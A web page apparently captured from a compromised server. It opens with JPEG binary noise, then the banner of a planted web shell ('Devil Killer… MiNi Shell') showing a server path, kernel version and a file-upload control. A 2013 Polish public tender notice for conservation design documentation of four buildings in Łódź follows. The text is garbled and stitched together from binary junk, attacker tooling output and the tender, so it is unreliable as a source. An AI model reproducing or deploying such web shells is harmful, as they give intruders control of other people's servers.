JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130628/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130628/251360-N-2013.html

<p class="kh_header"><b>Łódź: Opracowanie dokumentacji projektowo - konserwatorskiej
dla nieruchomości przy
 ul. Tuwima 46, Zachodnia 76, Zachodnia 99, Zielona 6  w Łodzi
w ramach  Programu Mia100kamienic</b><br>
<b>Numer ogłoszenia: 251360 - 2013; data zamieszczenia: 28.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Śródmieście Centrum I , ul. Piotrkowska 86, 90-103 Łódź, woj. łódzkie, tel. 042 6300806 w. 122, faks 042 6300808.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - konserwatorskiej
dla nieruchomości przy
 ul. Tuwima 46, Zachodnia 76, Zachodnia 99, Zielona 6  w Łodzi
w ramach  Programu Mia100kamienic.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest - opracowanie dokumentacji projektowej - projektów budowlano - wykonawczych  dla budynków usytuowanych w nieruchomościach w Łodzi: Część I - Tuwima 46 - nieruchomość jest wpisana do Gminnej ewidencji zabytków.
Kubatura budynków:  front - 12 091,44 m3, prawa oficyna  - 4 910,94 m3 poprzeczna oficyna - 311,17 m3. Powierzchnia użytkowa - 3 489,24m2. W nieruchomości znajdują się 34 lokale mieszkalne ( w tym 3 wolne ) oraz 4 lokale użytkowe.
Zamawiający dla tej nieruchomości posiada inwentaryzację w wersji elektronicznej 
(PDF) oraz ekspertyzę  konstrukcyjno - budowlaną z 2013r.i wytyczne konserwatorskie określające zakres koniecznych robót remontowych 
Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynków do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe )
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia stropów,
3.2- remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej 
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką, 
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza, ( mapa do celów projektowych ),
3.7 - wymiany instalacji elektrycznej, oraz instalacji domofonowej połączonej z bramą i do odbioru RTV,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki betonowej w podwórzu i prześwicie bramowym, powierzchnia - 554 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą wszystkich budynków w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy.
Część II - Zachodnia 76- nieruchomość  jest wpisana do Gminnej ewidencji Rejestr  zabytków  w trakcie procedura wpisu do rejestru zabytków nieruchomych woj. Łódzkiego. Kubatura budynku - 3 220,82m3.  Powierzchnia użytkowa 449,16 m 2. W nieruchomości znajdują się 4 lokale mieszkalne ( w tym 2 wolne ).
Zamawiający dla tej nieruchomości posiada inwentaryzację w wersji elektronicznej (PDF) oraz orzeczenie o stanie technicznym z 2013r. i wytyczne konserwatorskie określające zakres koniecznych robót remontowych jak również wskazujące na konieczność opracowania programu prac konserwatorskich oraz projektu prac remontowo - konserwatorskich . Dokumentację należy opracować ściśle zgodnie z wytycznymi Wojewódzkiego Urzędu Ochrony Zabytków oraz orzeczeniem technicznym o stanie budynków w zakresie w jakim opracowanie to nie jest sprzeczne z w/w wytycznymi lub uzyskać odstępstwa, a z uwagi na planowaną zmianę funkcji budynku z mieszkalnej na użytkową również decyzją o warunkach zabudowy.
Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynku do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe ),  
2. W zakresie przebudowy lokali - projekt uwzględniający zmianę funkcji z mieszkalnej na użytkową. 
3. W zakresie dotyczącym całego budynku z uwzględnieniem zmiany sposobu użytkowania po uprzednim uzyskaniu decyzji o warunkach zabudowy projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 -remontu klatki schodowej z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej 
3.5 - remontu wszystkich elewacji z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynku i pod nawierzchnią podwórza,
3.7 - wymiany instalacji elektrycznej, oraz instalacji domofonowej i do odbioru RTV,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki betonowej w podwórzu powierzchnia 
- 371 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów :
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót. 

Część III -  Zachodnia 99  - nieruchomość nie jest wpisana do Gminnej ewidencji zabytków.
Kubatura budynków:  front  i  prawa oficyna   7 838,10 m3. Powierzchnia użytkowa
 2 424, 85 m2 w nieruchomości znajduje się 12 lokali mieszkalnych oraz 2 lokale użytkowe. 
Zamawiający dla tej nieruchomości posiada inwentaryzację w wersji elektronicznej (PDF) oraz ekspertyzę  konstrukcyjno - budowlaną z 2013r.  i wytyczne konserwatorskie określające zakres koniecznych robót remontowych . 
Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 

1.1 - projekt docieplenia stropów parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CWU i rozbudowy - modernizacji instalacji CO oraz remontu pomieszczenia węzła,  
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 - wymiany lub remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej ,
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza,
3.6 - wymiany instalacji elektrycznej,
3.7 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki betonowej w podwórzu powierzchnia - 584 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy.
 Część IV - Zielona  6  - nieruchomość  jest wpisana do Rejestru zabytków woj. Łódzkiego.
Kubatura budynków:  front - 5 572,61 m3 ; prawa oficyna - 3 196,34 m3 ; lewa oficyna - 3 329,74 m3 ; poprzeczna oficyna - 264,25 m3. W nieruchomości znajduje się 20 lokali mieszkalnych ( w tym 17 wolnych ) oraz 13 lokali użytkowych i 2 pomieszczenia gospodarcze ( w tym 7 wolnych ). Nieruchomość w znacznej części wyłączona z użytkowania.
Zamawiający dla tej nieruchomości posiada inwentaryzację w wersji elektronicznej (PDF) oraz orzeczenie o stanie technicznym z 2013r.  i wytyczne konserwatorskie określające zakres koniecznych robót remontowych jak również wskazujące na konieczność opracowania programu prac konserwatorskich oraz projektu prac remontowo - konserwatorskich poprzedzonego szczegółowo określonymi pracami przedprojektowymi.
Dokumentację należy opracować ściśle zgodnie z wytycznymi Miejskiego Konserwatora Zabytków oraz orzeczeniem technicznym o stanie budynków w zakresie w jakim opracowanie to nie jest sprzeczne z w/w wytycznymi lub uzyskać odstępstwa. Z uwagi na planowaną zmianę funkcji mieszkalnej na użytkową w budynku frontowym  należy uzyskać decyzję o warunkach zabudowy.
. 
Dokumentacja musi zawierać w szczególności projekty budowlane i wykonawcze:
1. W zakresie termomodernizacji: 
1.1 - projekt docieplenia stropu parteru i nad ostatnią   kondygnacją oraz szczytowych elewacji budynków, zestawienie stolarki okiennej i drzwiowej do wymiany,
1.2 - projekt instalacji CO i CWU oraz adaptacji pomieszczenia na węzeł lub w przypadku braku możliwości podłączenia budynku do sieci ciepłowniczej zaprojektowanie innego sposobu ogrzewania ( np. gazowe ),  
2. W zakresie przebudowy lokali mieszkalnych i użytkowych - projekt zmiany struktury lokali w kierunku poprawy ich funkcjonalności i umożliwiającym stwierdzenie  samodzielności,
3. W zakresie dotyczącym całego budynku projekty:
3.1 - wzmocnienia lub wymiany stropów,
3.2 - wymiany lub remontu klatek schodowych z uwzględnieniem piwnic i pomieszczeń strychowych,
3.3 - remontu lub wymiany więźby dachowej i pokrycia dachu,
3.4 - izolacji przeciwwilgociowej pionowej i poziomej ,
3.5 - remontu wszystkich elewacji i prześwitu bramowego z kolorystyką,
3.6 - wymiany instalacji wodnej - od wodomierza głównego oraz  kanalizacyjnej w budynkach i pod nawierzchnią podwórza,
3.7 - wymiany instalacji elektrycznej,
3.8 - wymiany  instalacji gazowej,
4. Projekt wykonania nawierzchni z kostki  w podwórzu powierzchnia - 251 m2 wraz z projektem zagospodarowania terenu i pomieszczenia do gromadzenia odpadów.
5. Inwentaryzację budowlaną powykonawczą budynku w skali 1:100 oraz wizualizację z planem zagospodarowania terenu. 
6. Dla wszystkich projektów opracowany na całość oraz odrębnie na każdy budynek:
- kosztorys inwestorski, 
- przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót, umożliwiające wykonanie robót w podziale na etapy.

UWAGA: przewidziano różne terminy wykonania poszczególnych części przedmiotu zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.00.00-2, 71.24.20.00-6, 71.24.50.00-7, 71.24.80.00-8, 71.25.00.00-5, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda od Wykonawcy wniesienia wadium dla każdej części przedmiotu zamówienia osobno tj.; 
1. Dla Części I  Tuwima 46 : w wysokości  2 322,55 zł (słownie: dwa  tysiące
    trzysta dwadzieścia dwa zł 55/100),
2. Dla Części II Zachodnia 76:  w wysokości  628,45 zł (słownie: sześćset
    dwadzieścia osiem zł 45/100
3. Dla Części III Zachodnia 99:   w wysokości  1  051,45 zł (słownie: jednen  tysiąc
   Pięćdziesiąt jeden   zł  45/100). 
4.  Dla Części IV Zielona 6:   w wysokości  2 412,28 zł (słownie: dwa tysiące 
    czterysta dwanaście zł 28 /100   zł 

5.Wadium wnosi się przed upływem terminu składania ofert.
6. Wadium może być wniesione w następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust.3 pkt 4 lit.b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
7 .Wadium  wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego tj. GETIN Bank S.A. w Katowicach IV/O w Łodzi  35 1560 0013 2376 1236 0000 0005.
8. W przypadku innej formy niż pieniężna należy do oferty załączyć oryginał dokumentu ważnego w okresie związania ofertą.
9. Zwrot lub zatrzymanie wadium nastąpi na zasadach określonych w art.46 PZP</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki spełnią wykonawcy, którzy:
złożą oświadczenie w zakresie art. 22 ust. 1 ustawy Pzp  Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki spełnią wykonawcy, którzy: wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali:

Dla części I 
- minimum jeden projekt budowlany i wykonawczy i uzyskali pozwolenie na budowę modernizacji, przebudowy lub rozbudowy obiektu (samodzielnie lub jako jeden z obiektów zespołu urbanistycznego) wpisanego do ewidencji lub rejestru zabytków albo położonego na terenie objętym ochroną konserwatorską, o kubaturze co najmniej 10 000 m3, w zakresie architektury i konstrukcji odpowiadającym przedmiotowi zamówienia,

Dla części II
- minimum jeden projekt budowlany wykonawczy modernizacji, przebudowy lub rozbudowy obiektu (samodzielnie lub jako jeden z obiektów zespołu urbanistycznego) wpisanego do ewidencji lub rejestru zabytków albo położonego na terenie objętym ochroną konserwatorską, o kubaturze co najmniej 1 500 m3, w zakresie architektury i konstrukcji odpowiadającym przedmiotowi zamówienia, poprzedzony przeprowadzeniem kompleksowych badań konserwatorskich substancji zabytku i elementów jego wystroju i opracowaniem programu prac konserwatorskich.

Dla części III
- minimum jeden projekt budowlany i wykonawczy modernizacji, przebudowy lub rozbudowy obiektu (samodzielnie lub jako jeden z obiektów zespołu urbanistycznego) wpisanego do ewidencji lub rejestru zabytków albo położonego na terenie objętym ochroną konserwatorską, o kubaturze co najmniej 6 000 m3, w zakresie architektury i konstrukcji odpowiadającym przedmiotowi zamówienia,

Dla części IV
- minimum jeden projekt budowlany i wykonawczy modernizacji, przebudowy lub rozbudowy obiektu (samodzielnie lub jako jeden z obiektów zespołu urbanistycznego) wpisanego do ewidencji lub rejestru zabytków albo położonego na terenie objętym ochroną konserwatorską, o kubaturze co najmniej 9 000 m3, w zakresie architektury i konstrukcji odpowiadającym przedmiotowi zamówienia, poprzedzony przeprowadzeniem kompleksowych badań konserwatorskich substancji zabytku i elementów jego wystroju i opracowaniem programu prac konserwatorskich.

Jeżeli Wykonawca złoży ofertę na więcej niż jedną część przedmiotu zamówienia, winien wykazać się wykonaniem usług odpowiadających sumie kubatur  wymaganych dla danych części zamówienia ( np. składając ofertę na część I i IV należy wykazać się wykonaniem co najmniej dwóch projektów w obiektach o łącznej kubaturze 19 000 m3 z czego jeden dla kubatury co najmniej 10 000 m3, a drugi co najmniej 9 000 m3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki spełnią wykonawcy, którzy: wykażą, że dysponują osobami zdolnymi do wykonania przedmiotu zamówienia, posiadającymi uprawnienia budowlane do projektowania (co najmniej jedną osobą w danej specjalności):
Dla części I 
konstrukcyjno - budowlanej 
architektonicznej,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, 
instalacyjnej w zakresie: sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
Dla części II 
konstrukcyjno - budowlanej, 
architektonicznej, 
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
instalacyjnej w zakresie: sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
jedną osobą, która może prowadzić badania konserwatorskie zabytków wpisanych do rejestru zabytków posiadającą:
- tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku konserwacja i restauracja dzieł sztuki lub w specjalności w zakresie konserwacji zabytków oraz odbyła po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
lub
- jeśli dziedzina nie jest objęta programem studiów wyższych jw.: świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie albo dyplom mistrza w zawodzie odpowiadającym danej dziedzinie oraz odbyła co najmniej 5 - letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.

Dla części III
konstrukcyjno - budowlanej,
architektonicznej,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
instalacyjnej w zakresie: sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
Dla części IV
konstrukcyjno - budowlanej,
architektonicznej,
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
instalacyjnej w zakresie: sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,
jedną osobą, która może prowadzić badania konserwatorskie zabytków wpisanych do rejestru zabytków posiadającą:


- tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku konserwacja i restauracja dzieł sztuki lub w specjalności w zakresie konserwacji zabytków oraz odbyła po ukończeniu tych studiów co najmniej 12 - miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          
lub
- jeśli dziedzina nie jest objęta programem studiów wyższych jw.: świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie albo dyplom mistrza w zawodzie odpowiadającym danej dziedzinie oraz odbyła co najmniej 5 - letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.

W przypadku składania oferty na więcej niż jedną część przedmiotu zamówienia, Wykonawca musi wykazać dysponowanie osobami z uprawnieniami wymaganymi osobno dla tych części zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki spełnią wykonawcy, którzy: wykażą, że posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na okres realizacji przedmiotu umowy, na kwotę minimum - 100 000,00  zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

